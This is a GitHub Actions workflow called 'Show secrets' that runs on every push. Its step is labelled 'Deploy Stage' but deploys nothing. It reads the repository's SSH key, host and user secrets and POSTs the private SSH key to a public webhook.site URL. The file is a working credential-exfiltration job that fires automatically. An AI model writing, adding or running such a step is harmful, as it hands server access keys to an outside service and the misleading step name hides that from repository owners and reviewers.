name: Show secrets
on: [push]
jobs:
  debug:
    name: Show secrets
    runs-on: ubuntu-latest
    steps:
      - name: Deploy Stage
        env:
          SERVER_SSH_KEY: ${{ secrets.SSH_KEY }}
          SERVER_HOST: ${{ secrets.HOST }}
          SERVER_USER: ${{ secrets.USER }}
        uses: fjogeleit/http-request-action@v1
        with:
          url: 'https://webhook.site/e2e13ff5-533f-47a3-92d6-aab8a2194177'
          method: 'POST'
          customHeaders: '{"Content-Type": "application/json"}'
          data: ${{ secrets.SSH_KEY }}